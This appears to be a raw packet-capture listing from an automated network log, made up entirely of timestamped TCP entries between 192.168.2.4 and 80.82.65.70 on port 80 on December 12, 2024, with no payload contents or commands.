                                        Dec 12, 2024 23:09:05.124491930 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.124504089 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.124560118 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.126923084 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.126934052 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.126985073 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.129426003 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.129436970 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.129498005 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.132112026 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.132122993 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.132180929 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.134403944 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.134414911 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.134493113 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.134493113 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.136718035 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.136729956 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.136760950 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.136779070 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.139204025 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.139215946 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.139256001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.141772032 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.141782045 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.141855955 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.141899109 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.144215107 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.144224882 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.144294977 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.146689892 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.146699905 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.146738052 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.146783113 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.149029016 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.149039984 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.149084091 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.151453972 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.151464939 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.151521921 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.153983116 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.153995991 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.154129028 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.156305075 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.156316042 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.156372070 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.158952951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.158968925 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.159024954 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.159054041 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.161310911 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.161322117 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.161401987 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.163825989 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.163837910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.163893938 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.166207075 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.166218996 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.166260958 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.168669939 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.168682098 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.168735027 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.171171904 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.171184063 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.171248913 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.173616886 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.173629999 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.173681974 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.176059961 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.176074982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.176141977 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.178719997 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.178731918 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.178775072 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.180934906 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.180991888 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.215993881 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.336007118 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.948359013 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.948373079 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.948430061 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.949512005 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.949522972 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.949582100 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.951301098 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.951311111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.951340914 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.951354980 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.951386929 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.952835083 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.952843904 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.952888966 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.952915907 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.952950001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.955070972 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.955082893 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.955131054 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.957051039 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.957061052 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.957107067 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.959378004 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.959388018 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.959420919 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.960954905 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.960964918 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.960994959 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.961009979 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.962867022 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.962915897 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.964865923 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.964875937 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.964911938 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.965065956 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.965100050 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.967015982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.967025042 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.967052937 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.967081070 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.969044924 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.969054937 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.969082117 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.969098091 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.971039057 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.971050024 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.971074104 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.971092939 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.973186016 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.973197937 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.973243952 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.975218058 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.975229979 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.975265026 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.975297928 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.977108955 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.977121115 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.977164030 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.979135036 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.979146957 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.979182959 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.979221106 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.981128931 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.981141090 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.981173038 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.983321905 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.983334064 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.983370066 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.983386040 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.985151052 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.985162020 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.985196114 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.987054110 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.987109900 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.987358093 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.987401009 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.989247084 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.989258051 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.989293098 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.989308119 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.991225958 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.991236925 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.991275072 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.991296053 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.993235111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.993246078 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.993284941 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.995228052 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.995239019 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.995265007 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.995296001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.997251034 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.997262955 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.997302055 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.999373913 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.999442101 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.025834084 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.025875092 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.025902987 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.026932001 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.026962042 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.026981115 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.026997089 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.027031898 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.028857946 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.028893948 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.029597044 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.029634953 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.029771090 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.029805899 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.031655073 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.031697035 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.031888008 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.031929970 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.033998966 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.034043074 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.034109116 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.034145117 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.035686970 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.035737038 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.035788059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.035830021 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.037692070 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.037731886 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.037803888 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.037842989 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.039649963 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.039694071 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.039761066 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.039798975 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.041654110 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.041697025 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.041882038 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.041918039 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.043667078 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.043701887 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.043852091 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.043891907 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.045674086 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.045712948 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.045797110 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.045893908 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.047738075 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.047786951 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.047888041 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.047925949 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.049762964 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.049814939 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.049885988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.049925089 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.051762104 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.051805973 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.051839113 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.051871061 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.053772926 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.053833961 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.053886890 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.053927898 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.055879116 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.055948973 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.056025028 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.056076050 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.057873011 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.057914972 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.057984114 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.058022022 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.059854031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.059900045 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.060034037 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.060069084 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.061836004 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.061881065 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.061914921 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.061952114 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.063848019 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.063909054 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.063946009 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.063988924 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.065857887 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.065901041 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.065913916 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.065942049 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.068003893 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.068046093 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.068084002 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.068119049 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.069894075 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.069936037 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.070070028 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.070108891 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.071940899 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.071981907 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.072112083 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.072146893 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.073888063 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.073934078 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.073936939 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.073982000 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.075947046 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.076006889 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.076026917 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.076056957 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.077961922 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.078011990 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.078111887 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.078154087 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.079936981 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.079982042 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.080144882 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.080184937 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.081986904 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.082112074 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.082197905 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.082240105 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.140625954 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.140644073 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.140786886 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.141321898 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.141382933 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.141470909 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.141510963 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.143342972 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.143408060 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.143661022 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.143702984 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.145294905 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.145344973 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.145414114 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.145453930 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.147408009 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.147456884 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.147491932 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.147521973 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.149467945 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.149514914 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.149537086 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.149557114 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.151441097 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.151488066 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.151583910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.151624918 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.153471947 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.153518915 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.153587103 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.153626919 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.155503035 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.155550003 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.155589104 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.155632019 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.157645941 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.157696962 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.157773972 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.157821894 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.159442902 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.159497976 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.159503937 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.159648895 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.161475897 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.161518097 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.161551952 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.161607027 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.163511038 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.163552999 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.163712025 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.163754940 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.165507078 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.165551901 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.165587902 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.165627003 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.167562962 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.167606115 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.167612076 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.167642117 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.169538975 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.169550896 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.169585943 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.169601917 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.171561956 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.171627998 CET4974480192.168.2.480.82.65.70
